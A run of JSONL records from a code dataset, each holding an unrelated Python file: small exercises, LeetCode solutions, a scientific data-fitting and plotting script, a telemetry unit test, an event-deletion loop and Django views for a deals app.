#TDP.saveModelAsWordVector(path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\")\n    #wv = TDP.getWordVector(path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\")\n    #replace the tokens with their word vectors\n    #vecList = TDP.getVecList()\n\n    #w2i, i2w = TDP.getDictionary()\n    #corpus = TDP.getCorpus(w2i, matrix=True)\n    #EmbeddingMatrix = TDP.getEmbeddingMatrix(i2w)\n","sub_path":"www/classifier/trainDataProcess.py","file_name":"trainDataProcess.py","file_ext":"py","file_size_in_byte":15628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631808681","text":"# -*- coding: utf-8 -*-\nimport sys\nimport random\nimport traceback\nimport math\n\nstep_to_goal = 30\ndice_num = 10\n\ndef show_rule():\n    print(\"The goal is {0} squares ahead\".format(step_to_goal))\n    print(\"Roll as many of the {0} dice as you like to move your piece forward\".format(dice_num))\n    print(\"Land exactly on the goal to finish. If you roll too high, you move back by the excess.\")\n\ndef run():\n    counter = 1\n    rest_step = step_to_goal\n    while rest_step != 0:\n        print(\"Turn {0}\".format(counter))\n        print(\"{0} squares to go\".format(rest_step))\n        num = get_input()\n        step = sum([random.randint(1, 6) for _ in xrange(num)])\n        print(\"Total rolled: {0}\".format(step))\n        rest_step -= step\n        rest_step = int(math.fabs(rest_step)) if rest_step < 0 else rest_step\n        counter += 1\n    print(\"Finished in {0} turns\".format(counter - 1))\n\ndef get_input():\n    print(\"Number of dice\")\n    while True:\n        num = raw_input('>')\n        if num.isdigit() and (1 <= int(num) <= dice_num):\n            return int(num)\n\nif __name__ == '__main__':\n    try:\n        show_rule()\n        run()\n    except Exception as e:\n        print(traceback.format_exc())\n    finally:\n        sys.exit(0)\n","sub_path":"01_various/047_sugoroku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"515921479","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 23 21:56:50 2016\n\n@author: alec\n\"\"\"\n\n#---------------- IMPORTS ----------------------------------------\n#-----------------------------------------------------------------\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nfrom scipy import misc\nfrom scipy import signal\nfrom scipy.optimize import curve_fit\nimport scipy.fftpack as fft\nimport json\nimport matplotlib.pylab as pylab\nimport vector_reconstruction as vr\nimport load_scan as lscan\nimport fourier_image as fi\nimport format_plot as fp\n\npi = np.pi\n\nscannum = 1903\n#scanbacknum = 1740\nxres = 50\nyres = 50\nzfield = 0\nscanL = 0.5*5e-6\n\nsavepath = '/Users/alec/UCSB/cofeb_analysis_data/irmn/'\ndata = lscan.load_ff('/Users/alec/UCSB/scan_data/'+str(scannum)+'-esrdata/fitdata.txt', xres, yres, 
15)\n#misc.imsave('/Users/alec/UCSB/scan_images/full-field/ff1760.png', data[0])\nffmask = ndimage.imread('/Users/alec/UCSB/scan_images/full-field/ff1903mask.png', flatten=True)\nffmask = np.multiply(np.add(np.multiply(ffmask,1/255),-0.5),-2)\n\npath = '/Users/alec/UCSB/cofeb_analysis_data/irmn/'\nfilespec = 'Msfixed'\ncal_params_path = path+'cal_parameters_'+filespec+'.json'\nwith open(cal_params_path, 'r') as fread:\n cal_params = json.load(fread)\n\nMs = cal_params['Ms']\nt = cal_params['t']\nphi = cal_params['phi']\ntheta = cal_params['theta']\nthetaError = cal_params['thetaError']\n# height = cal_params['height']\nheight = 135.0*1e-9\nheightError = cal_params['heightError']\n\n#---------------- FIT FUNCTIONS ----------------------------------\n#-----------------------------------------------------------------\n\ndef fit_tanh(x, *params):\n y = np.zeros_like(x)\n c = params[0]\n a = params[1]\n x0 = params[2]\n wid = params[3]\n\n y = c+(a/2)*np.tanh((x-x0)/wid)\n return y\n\n#---------------- RECONSTRUCTION ---------------------------------\n#-----------------------------------------------------------------\n\ndatas = np.multiply(ffmask,data[0])\ndatas0 = np.add(datas,-np.cos(theta)*zfield)\ndatas0filter = signal.wiener(datas0, 3)\ndlen = len(datas)\ncoswindow = np.zeros((dlen,dlen))\nfor j in range(0,dlen):\n for i in range(0,dlen):\n coswindow[j,i] = np.sin(pi*j/(dlen-1)) * np.sin(pi*i/(dlen-1))\n# datas0filter = signal.medfilt(datas0, 7)\n\nrecon_data = vr.vector_reconstruction(datas0filter, data[1], theta, thetaError, phi, height, scanL, kcutoff=1)\n\nbxdata = recon_data[0]\nbydata = recon_data[1]\nbzdata = recon_data[2]\nmdatak = recon_data[6]*(coswindow**2)\nVdata = recon_data[4]\nbzdataError = recon_data[5]\n\nmdata = np.real(fft.ifft2(fft.ifftshift(mdatak)))\n\nmdataint = ndimage.interpolation.zoom(mdata, 2, order=1)\n\nnp.savetxt(savepath+'bx_'+str(scannum)+'_'+filespec+'.txt', bxdata, delimiter=',')\nnp.savetxt(savepath+'by_'+str(scannum)+'_'+filespec+'.txt', bydata, delimiter=',')\nnp.savetxt(savepath+'bz_'+str(scannum)+'_'+filespec+'.txt', bzdata, delimiter=',')\nnp.savetxt(path+'bzError_'+str(scannum)+'_'+filespec+'.txt', bzdataError, delimiter=',')\nnp.savetxt(savepath+'bnv_'+str(scannum)+'_'+filespec+'.txt', data[0], delimiter=',')\nnp.savetxt(path+'mdata_'+str(scannum)+'_'+filespec+'.txt', mdata, delimiter=',')\nnp.savetxt(path+'V_'+str(scannum)+'_'+filespec+'.txt', Vdata, delimiter=',')\n\n#---------------- LINECUTS ---------------------------------------\n#-----------------------------------------------------------------\n\nx0, y0 = 22, 28\nphinum = 16\nlcnum = 15\nlclen = 15\nmphi = np.zeros((phinum,lcnum))\nfor i in range(0,phinum):\n phi = i*2*pi/phinum\n x1, y1 = x0-lclen*np.cos(phi), y0-lclen*np.sin(phi)\n x, y = np.linspace(x0, x1, lcnum), np.linspace(y0, y1, lcnum)\n mphi[i] = ndimage.map_coordinates(np.transpose(mdata), np.vstack((x,y)), order=1)\n\nx0, y0 = 21.5, 28\nphinum = 16\nbzlcnum = 15\nbzlclen = 15\nbzphi = np.zeros((phinum,bzlcnum))\nfor i in range(0,phinum):\n phi = i*2*pi/phinum\n x1, y1 = x0-lclen*np.cos(phi), y0-lclen*np.sin(phi)\n x, y = np.linspace(x0, x1, bzlcnum), np.linspace(y0, y1, bzlcnum)\n bzphi[i] = ndimage.map_coordinates(np.transpose(bzdata), np.vstack((x,y)), order=1)\n\n#---------------- LINE FITS --------------------------------------\n#-----------------------------------------------------------------\n\nxf = np.arange(0,lcnum)\nfits = np.zeros((phinum,lcnum))\nguesses = np.zeros((phinum, 4))\nwidths = np.zeros(phinum)\nr0s = 
np.zeros(phinum)\nangles = np.linspace(0,2*pi,phinum)\n\nfor i in range (0,phinum):\n\ty = mphi[i]\n\tguesses[i] = [(y[-1]+y[0])/2,y[-1]-y[0],6,1]\n\tpopt, pcov = curve_fit(fit_tanh, xf, mphi[i], p0=guesses[i])\n\tfits[i] = fit_tanh(xf, *popt)\n\twidths[i] = np.abs(popt[3])\n\tr0s[i] = popt[2]*scanL/xres\n\nnp.savetxt('/Users/alec/UCSB/cofeb_analysis_data/irmn/stray_field_sim/radiusphi_'+filespec+'.txt',(angles,r0s), delimiter=',')\n\nbguesses = np.zeros((phinum, 4))\nbfits = np.zeros((phinum,bzlcnum))\nbwidths = np.zeros(phinum)\nbxf = np.arange(0,bzlclen)\n\nfor i in range (0,phinum):\n y = bzphi[i]\n bguesses[i] = [(y[-1]+y[0])/2,y[-1]-y[0],6,1]\n bpopt, bpcov = curve_fit(fit_tanh, bxf, bzphi[i], p0=bguesses[i])\n bfits[i] = fit_tanh(xf, *bpopt)\n bwidths[i] = np.abs(bpopt[3])\n\n\n#---------------- PLOTS ------------------------------------------\n#-----------------------------------------------------------------\n\nplt.close('all')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(datas0, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/datas_'+str(scannum)+filespec+'.png', format='png')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(bxdata, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/bx_'+str(scannum)+filespec+'.png', format='png')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(bydata, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/by_'+str(scannum)+filespec+'.png', format='png')\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(bzdata, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 250, 250, 50, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/bz_'+str(scannum)+filespec+'.png', format='png')\n\n\nfig1, ax1 = plt.subplots()\nim1 = plt.imshow(datas0filter, cmap='gray', interpolation='nearest')\nfig1.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nfp.format_plot(plt, 400, 400, 50, 50)\n\nfig1, ax1 = plt.subplots()\nfig1.set_size_inches(4, 4)\nim1 = plt.imshow(mdata, cmap='jet', interpolation='nearest')\nplt.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04, use_gridspec=True)\n\nfor i in range(0,phinum):\n phi = i*2*pi/phinum\n x1, y1 = x0-lclen*np.cos(phi), y0-lclen*np.sin(phi)\n plt.plot([x0, x1], [y0, y1], 'k-')\nplt.axis('image')\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 400, 400, 450, 50)\npylab.savefig('/Users/alec/UCSB/scan_images/meff_'+str(scannum)+filespec+'.png', format='png')\n\n\n\nfig, axes = plt.subplots(nrows=phinum, sharex=True, sharey=True)\nfig.set_size_inches(3, 5)\n\nfor i in range(0,phinum):\n\taxes[i].plot(mphi[i],'b.')\n\taxes[i].plot(xf, fit_tanh(xf, *guesses[i]), 'g')\n\taxes[i].plot(xf, fits[i], 'r')\n\taxes[i].get_yaxis().set_visible(False)\n\nfig.subplots_adjust(hspace=0)\nplt.setp([a.get_xticklabels() for a in fig.axes[:-1]], 
visible=False)\n#fig.tight_layout()\nax1.xaxis.set_ticklabels([])\nax1.yaxis.set_ticklabels([])\nfp.format_plot(plt, 400, 900, 900, 50, tight=False)\npylab.savefig('/Users/alec/UCSB/scan_images/meff_linecuts_'+str(scannum)+filespec+'.png', format='png')\n\n\nfig1, ax1 = plt.subplots()\nim1 = plt.imshow(mdataint, cmap='jet', interpolation='nearest')\nplt.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nfp.format_plot(plt, 400, 400, 50, 450)\n\n\nfig1, ax1 = plt.subplots()\nplt.imshow(bzdata, cmap='gray', interpolation='nearest')\nplt.colorbar(im1, ax=ax1, fraction=0.046, pad=0.04)\nfp.format_plot(plt, 400, 400, 450, 450)\n\nfig1, ax1 = plt.subplots()\nx = np.linspace(0,2*pi,phinum)\nplt.plot(x, r0s)\nfp.format_plot(plt, 400, 400, 850, 450)\n\nplt.show()\n","sub_path":"cofeb_analysis/irmn/vector_reconstruction_1903.py","file_name":"vector_reconstruction_1903.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544075166","text":"\"\"\"\nExercise 1.41 - ☆☆ Leibniz' formula for π\nIt can be shown that the following infinite sum:\n\n    4 * (1 - 1/3 + 1/5 - 1/7 + ...) = 4 * sum_{n=0}^{∞} (-1)^n / (2n + 1)\n\ntends to π (although the series converges slowly).\nThe task is to write an implementation that computes the sum of the series (using iteration) to obtain approximate values of π. Since it is an infinite series, i.e. it has infinitely many terms, it is not reasonable to let the computer iterate forever. The formula therefore has to be modified (an approximation):\n\n    π ≈ 4 * sum_{n=0}^{k} (-1)^n / (2n + 1)\n\nBy increasing the value of k, e.g. 100, 200, 300, ..., you get more and more accurate approximations. Increase k in your program until you start to recognize the value of π.\nHint: Keep in mind that (-1)^n = 1 when n is even and (-1)^n = -1 when n is odd if you set a threshold on the size of the terms to stop the iteration.\n\n\nNote: The computer works with floating-point numbers, which are approximations of decimal numbers, so the calculations are not exact.\n\"\"\"\n\n\ndef estimate_pi(k=100):\n    total = 0\n    for i in range(k + 1):\n        val = 1 / (2 * i + 1)\n        if i % 2 == 0:\n            total += val\n        else:\n            total -= val\n    return 4 * total\n\n\nprint(\"π ≈ \" + str(estimate_pi(int(input(\"k = \")))))","sub_path":"Uppgifter/1/1.41.py","file_name":"1.41.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394592592","text":"import time\n\nfrom historical_system_profiles import db_interface\nfrom historical_system_profiles import listener_metrics as metrics\n\n\ndef _delete_profiles(data, ptc, logger):\n    \"\"\"\n    delete all profiles for the inventory ID in the message\n    \"\"\"\n    inventory_id = data.value[\"id\"]\n    request_id = data.value[\"request_id\"]\n    account = data.value[\"account\"]\n\n    _record_recv_message(request_id, inventory_id, account, ptc)\n    db_interface.delete_hsps_by_inventory_id(inventory_id)\n    logger.info(\"deleted profiles for inventory_id %s\" % inventory_id)\n    _record_success_message(request_id, inventory_id, account, ptc)\n\n\ndef _record_recv_message(request_id, inventory_id, account, ptc):\n    metrics.delete_messages_consumed.inc()\n    ptc.emit_received_message(\n        \"received inventory delete event\",\n        request_id=request_id,\n        account=account,\n        inventory_id=inventory_id,\n    )\n\n\ndef _record_success_message(request_id, inventory_id, account, ptc):\n    metrics.delete_messages_processed.inc()\n    ptc.emit_success_message(\n        \"deleted profiles for inventory record\",\n        request_id=request_id,\n        account=account,\n        
inventory_id=inventory_id,\n )\n\n\ndef _emit_delete_error(data, ptc):\n \"\"\"\n send an error message to payload tracker. This does not raise an\n exception.\n \"\"\"\n metrics.delete_messages_errored.inc()\n inventory_id = data.value[\"id\"]\n request_id = data.value[\"request_id\"]\n account = data.value[\"account\"]\n ptc.emit_error_message(\n \"error when deleting profiles for inventory record\",\n request_id=request_id,\n account=account,\n inventory_id=inventory_id,\n )\n\n\ndef event_loop(flask_app, consumer, ptc, logger, delay_seconds):\n with flask_app.app_context():\n while True:\n time.sleep(delay_seconds)\n for data in consumer:\n try:\n if data.value[\"type\"] == \"delete\":\n _delete_profiles(data, ptc, logger)\n except Exception:\n _emit_delete_error(data, ptc)\n logger.exception(\"An error occurred during message processing\")\n","sub_path":"historical_system_profiles/deleter.py","file_name":"deleter.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325029731","text":"\"\"\"\nInput: (2 -> 4 -> 3) + (5 -> 6 -> 4)\nOutput: 7 -> 0 -> 8\n\"\"\"\nclass Solution:\n # @param {ListNode} l1\n # @param {ListNode} l2\n # @return {ListNode}\n def addTwoNumbers(self, l1, l2):\n return self.helper(l1, l2, 0)\n \n def helper(self, l1, l2, carry):\n if not l1 and not l2:\n if carry == 0:\n return\n return ListNode(1)\n elif not l1:\n return self.helper(l2, ListNode(carry), 0)\n if not l2:\n return self.helper(l1, ListNode(carry), 0)\n\n new = l1.val + l2.val + carry\n node = ListNode(new%10)\n node.next = self.helper(l1.next, l2.next, new/10)\n return node\n","sub_path":"Leetcode/addTwoNumbers.py","file_name":"addTwoNumbers.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5082876","text":"#https://leetcode.com/problems/island-perimeter/description/\n#easy\nclass Solution(object):\n def islandPerimeter(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n count = 0\n height = len(grid)\n width = len(grid[0])\n for h in range(height): \n for w in range(width): \n if grid[h][w] == 1:\n if h==0: count += 1 \n if w==0: count += 1\n if h==height-1: count += 1\n if w==width-1: count += 1\n if h-1 >= 0 and grid[h-1][w] == 0: count +=1\n if w-1 >= 0 and grid[h][w-1] == 0: count +=1\n if h+1 < height and grid[h+1][w] == 0: count +=1\n if w+1 < width and grid[h][w+1] == 0: count +=1\n \n return count\n \n","sub_path":"island-perimeter.py","file_name":"island-perimeter.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565406421","text":"# Copyright 2019 The Chromium Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\nimport unittest\n\nfrom telemetry.internal.results import page_test_results\nfrom telemetry.internal.platform.tracing_agent import telemetry_tracing_agent\nfrom tracing.trace_data import trace_data\n\nfrom py_trace_event import trace_event\n\n\nclass FakeTraceDataBuilder(object):\n  def __init__(self):\n    \"\"\"A fake trace builder that just captures trace data written to it.\"\"\"\n    self._data = None\n\n  def AddTraceFor(self, trace_part, data):\n    assert self._data is None\n    assert trace_part is trace_data.TELEMETRY_PART\n    self._data = data\n\n  def GetEventNames(self):\n    return [e['name'] for e in self._data['traceEvents']]\n\n  def GetTelemetryInfo(self):\n    return self._data['metadata']['telemetry']\n\n\n@unittest.skipUnless(trace_event.is_tracing_controllable(),\n                     'py_trace_event is not supported')\nclass TelemetryTracingAgentTest(unittest.TestCase):\n  def setUp(self):\n    platform = None  # Does not actually need one.\n    self.agent = telemetry_tracing_agent.TelemetryTracingAgent(platform)\n    self.config = None  # Does not actually need one.\n\n  def tearDown(self):\n    if self.agent.is_tracing:\n      self.agent.StopAgentTracing()\n\n  def testAddTraceEvent(self):\n    self.agent.StartAgentTracing(self.config, timeout=10)\n    with trace_event.trace('test-marker'):\n      pass\n    self.agent.StopAgentTracing()\n    trace = FakeTraceDataBuilder()\n    self.agent.CollectAgentTraceData(trace)\n    self.assertIn('test-marker', trace.GetEventNames())\n\n  def testRecordClockSync(self):\n    self.agent.StartAgentTracing(self.config, timeout=10)\n    self.agent.RecordIssuerClockSyncMarker('1234', issue_ts=0)\n    self.agent.StopAgentTracing()\n    trace = FakeTraceDataBuilder()\n    self.agent.CollectAgentTraceData(trace)\n    self.assertIn('clock_sync', trace.GetEventNames())\n\n  def testWriteTelemetryInfo(self):\n    info = page_test_results.TelemetryInfo()\n    info.benchmark_name = 'example'\n    info.benchmark_start_epoch = 0\n\n    self.agent.StartAgentTracing(self.config, timeout=10)\n    self.agent.SetTelemetryInfo(info)\n    self.agent.StopAgentTracing()\n    trace = FakeTraceDataBuilder()\n    self.agent.CollectAgentTraceData(trace)\n    benchmarks = trace.GetTelemetryInfo()['benchmarks']\n    self.assertEqual(len(benchmarks), 1)\n    self.assertEqual(benchmarks[0], 'example')\n","sub_path":"src/third_party/catapult/telemetry/telemetry/internal/platform/tracing_agent/telemetry_tracing_agent_unittest.py","file_name":"telemetry_tracing_agent_unittest.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161451079","text":"# -*- coding: utf-8 -*-\nimport math\na = int(input(\"Amount to be withdrawn in reais:\"))\n#START YOUR CODE HERE\nc20 = a//20\na = a%20\nc10 = a//10\na = a%10\nc5 = a//5\na = a%5\nc2 = a//2\na = a%2\nc1 = a//1\nprint(c20)\nprint(c10)\nprint(c5)\nprint(c2)\nprint(c1)\n","sub_path":"moodledata/vpl_data/154/usersdata/274/65500/submittedfiles/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509010491","text":"#!/usr/bin/env python3\n\n\"\"\"\\\nUsage:\n    gfp_timecourse.py <toml> [options]\n\nArguments:\n    <toml>\n        A path to a TOML file describing the layout of a qPCR plate.  See \n        https://pypi.org/project/bio96/ for more details.\n\nOptions:\n    -o --output PATH\n        Save the plot to the given path. 
The file type will be inferred from \n        the extension.  '$' will be replaced with the name of the input TOML \n        file (minus the extension).\n\n    -O --drop-outliers\n        Remove any data points labeled as outliers.\n\"\"\"\n\nimport docopt\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pathlib import Path\nfrom inspect import getfullargspec\nfrom numpy import inf\nfrom scipy.optimize import curve_fit\nfrom sgrna_sensor import qpcr\nfrom sgrna_sensor.style import pick_style, pick_data_style\n\ndef decay(t, k, y0, y_inf):\n    return y0 * 2**(-t/k) + y_inf\n\ndef fit_decay(df):\n    t = df.index.get_level_values('time')\n    y = df['fold_change']\n\n    p0 = 5, max(y), min(y)\n    bounds = (\n        (0, 0, 0),\n        (inf, inf, inf),\n    )\n\n    fit_args = getfullargspec(decay).args[1:]\n    fit_params, fit_covar = curve_fit(decay, t, y, p0, bounds=bounds)\n\n    col_names = fit_args + [f'{x}_std' for x in fit_args]\n    col_values = list(fit_params) + list(np.sqrt(np.diag(fit_covar)))\n    return pd.Series(dict(zip(col_names, col_values)))\n\nargs = docopt.docopt(__doc__)\ntoml_path = Path(args['<toml>'])\n\nattrs = ['primers', 'sgrna', 'ligand', 'time']\nquery = 'outlier == False' if args['--drop-outliers'] else None\ndf = qpcr.load(toml_path, query=query, aggregate=attrs, reference='16s')\n\npd.set_option('display.max_rows', 10000)\nprint(df)\n\nsgrnas = sorted(df.index.get_level_values('sgrna').unique(),\n        key=lambda x: ['on', 'off', 'rxb/11/1', 'mhf/30'].index(x))\nligands = sorted(df.index.get_level_values('ligand_after').unique(),\n        key=lambda x: [False, True].index(x))\ntimes = df.index.get_level_values('time').unique()\n\nfig, axes = plt.subplots(\n        len(ligands),\n        len(sgrnas),\n        figsize=(4*len(sgrnas), 4*len(ligands)),\n        sharex=True,\n        squeeze=False,\n)\n\nfor i, ligand in enumerate(ligands):\n    for j, sgrna in enumerate(sgrnas):\n        ax = axes[i,j]\n        fit_style = pick_style(sgrna, ligand)\n        data_style = pick_data_style(sgrna, ligand)\n\n        q = df.loc[sgrna, ligand]\n\n        t = q.index.get_level_values('time')\n        y = q['fold_change']\n\n        ax.plot(t, y, label='_', **data_style)\n\n        fit = fit_decay(q)\n        t_fit = np.linspace(0, max(t), 500)\n        y_fit = decay(t_fit, fit.k, fit.y0, fit.y_inf)\n        label = f'''\\\nk={fit.k:.1e} ± {fit.k_std:.1e}\ny0={fit.y0:.1e} ± {fit.y0_std:.1e}\ny∞={fit.y_inf:.1e} ± {fit.y_inf_std:.1e}'''\n\n        ax.plot(t_fit, y_fit, label=label, **fit_style)\n        ax.legend(loc='best')\n\nfor ax in axes[:,0]:\n    ax.set_ylabel(\"GFP mRNA level\\n[rel. 
to 16S rRNA]\")\nfor ax in axes[-1,:]:\n ax.set_xlabel(\"Time [min]\")\nfor i, ax in enumerate(axes[0,:]):\n ax.set_title(sgrnas[i])\nfor ax in axes.flat:\n ax.set_xlim(min(times), max(times))\n\nfig.tight_layout()\n\nif args['--output']:\n path = args['--output'].replace('$', toml_path.stem)\n fig.savefig(path)\n\nplt.show()\n","sub_path":"notebook/20181115_measure_ligrna_induction_time_scale/fit_half_life.py","file_name":"fit_half_life.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545923304","text":"#\n# [72] Edit Distance\n#\n# https://leetcode.com/problems/edit-distance/description/\n#\n# algorithms\n# Hard (33.23%)\n# Total Accepted: 123.3K\n# Total Submissions: 370K\n# Testcase Example: '\"horse\"\\n\"ros\"'\n#\n# Given two words word1 and word2, find the minimum number of operations\n# required to convert word1 to word2.\n#\n# You have the following 3 operations permitted on a word:\n#\n#\n# Insert a character\n# Delete a character\n# Replace a character\n#\n#\n# Example 1:\n#\n#\n# Input: word1 = \"horse\", word2 = \"ros\"\n# Output: 3\n# Explanation:\n# horse -> rorse (replace 'h' with 'r')\n# rorse -> rose (remove 'r')\n# rose -> ros (remove 'e')\n#\n#\n# Example 2:\n#\n#\n# Input: word1 = \"intention\", word2 = \"execution\"\n# Output: 5\n# Explanation:\n# intention -> inention (remove 't')\n# inention -> enention (replace 'i' with 'e')\n# enention -> exention (replace 'n' with 'x')\n# exention -> exection (replace 'n' with 'c')\n# exection -> execution (insert 'u')\n#\n#\n#\nclass Solution:\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n # Algorithm from http://asr.cs.cmu.edu/spring2014/lectures/class4.DP.pdf\n\n m = len(word1)\n n = len(word2)\n table = [[0 for _ in range(n+1)] for _ in range(m+1)]\n for i in range(m+1):\n for j in range(n+1):\n if i == 0 or j == 0:\n table[i][j] = max(i, j)\n else:\n table[i][j] = min(\n table[i-1][j] + 1,\n table[i][j-1] + 1,\n table[i-1][j-1] + (1 if word1[i-1] != word2[j-1] else 0),\n )\n return table[-1][-1]\n","sub_path":"LeetCodeSolutions/72.edit-distance.python3.py","file_name":"72.edit-distance.python3.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260774793","text":"from django.shortcuts import render,redirect\nfrom .models import *\nfrom django.contrib import messages\nfrom .view_method import *\nimport json,requests\nfrom datetime import datetime\nimport datetime as datetime_\nfrom django_pandas.io import read_frame\nfrom django.db import IntegrityError\nfrom django.contrib.auth.decorators import login_required\nimport sys,six,json\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator\nimport pandas as pd\nfrom .enums import *\nfrom django.http import JsonResponse\n# Create your views here.\n\n\n@login_required\ndef search_deals(request):\n if request.method == 'POST':\n search_str = json.loads(request.body).get('searchText')\n deals = Deals.objects.filter(date__icontains=search_str, owner=request.user) | Deals.objects.filter(\n name__icontains=search_str, owner=request.user)\n data = deals.values()\n return JsonResponse(list(data), safe=False)\n\n \ndef index(request):\n \"\"\"\n This view is to display the landing page\n\n \"\"\"\n\n return render(request, 'deal/Views/index.html')\n\n# Create your views here.\n@login_required\ndef 
view_deal(request):\n \"\"\"\n This view is to display the landing page\n\n \"\"\"\n\n deal = Deals.objects.filter(owner =request.user)\n paginator = Paginator(deal, 5)\n page_number = request.GET.get('page')\n page_obj = Paginator.get_page(paginator, page_number)\n\n context = {'saved_deals':deal,\n 'page_obj': page_obj}\n return render(request, 'deal/Views/dashboard.html',context)\n@login_required\ndef dashboad(request):\n \"\"\"\n This view is to display the landing page\n\n \"\"\"\n\n deal = Deals.objects.filter(owner =request.user)\n paginator = Paginator(deal, 5)\n page_number = request.GET.get('page')\n page_obj = Paginator.get_page(paginator, page_number)\n\n context = {'saved_deals':deal,\n 'page_obj': page_obj}\n return render(request, 'deal/Views/dashboad.html',context)\n\ndeal_data =None\ndef add_deal(request):\n \"\"\"\n Form for deal name and property status\n \"\"\"\n property_status = PropertyStatus.objects.all()\n context = {\n 'property_status':property_status\n }\n\n if request.method == 'GET':\n\n return render(request, 'deal/Views/add-deal.html', context)\n if request.method =='POST':\n name = request.POST['name']\n scheduler_time = request.POST['time']\n print(\"######## Deal's name is \", name)\n # import pdb\n #pdb.set_trace()\n property_status = request.POST['property_status']\n \n global deal_data\n def deal_data():\n return property_status, name\n if not name:\n messages.error(request, 'Name is required')\n return render(request, 'deal/Views/add-deal.html', context)\n\n \n\n return redirect('address_assets')\n\n\ndef address_asset(request):\n sort = Sort.objects.all()\n property_type = PropertyType.objects.all()\n expand_search_radius = ExpandSearchRadius.objects.all()\n home_size = HomeSize.objects.all()\n in_unit_features = InUnitFeatures.objects.all()\n community_ammenities = CommunityAmmenities.objects.all()\n ok = Ok.objects.all()\n\n sort_sale = SortSale.objects.all()\n property_type_sale = PropertyTypeSale.objects.all()\n property_type_nyc_only = PropertyTypeNycOnly.objects.all()\n no_hoa_fee = NoHoaFee.objects.all()\n home_size_min_sale = HomeSizeMinSale.objects.all()\n home_size_max_sale = HomeSizeMaxSale.objects.all()\n lot_size = LotSize.objects.all()\n stories = Stories.objects.all()\n garage = Garage.objects.all()\n heating_cooling = HeatingCooling.objects.all()\n inside_rooms = InsideRooms.objects.all()\n outside_features = OutsideFeatures.objects.all()\n lot_views = LotViews.objects.all()\n community_ammenities_sale = CommunityAmmenitiesSale.objects.all()\n features_in_nyc_only = FeaturesInNycOnly.objects.all()\n\n\n context = {\n 'sort':sort,\n 'property_types':property_type,\n 'expand_search_radius':expand_search_radius,\n 'home_sizes':home_size,\n 'in_unit_features':in_unit_features,\n 'community_ammenities':community_ammenities,\n 'ok':ok,\n 'sort_sales':sort_sale,\n 'property_type_sales':property_type_sale,\n 'property_type_nyc_only':property_type_nyc_only,\n 'no_hoa_fees':no_hoa_fee,\n 'home_size_min_sales':home_size_min_sale,\n 'home_size_max_sales':home_size_max_sale,\n 'lot_sizes':lot_size,\n 'stories':stories,\n 'garages':garage,\n 'heating_coolings':heating_cooling,\n 'inside_rooms':inside_rooms,\n 'outside_features':outside_features,\n 'lot_views':lot_views,\n 'community_ammenities_sales':community_ammenities_sale,\n 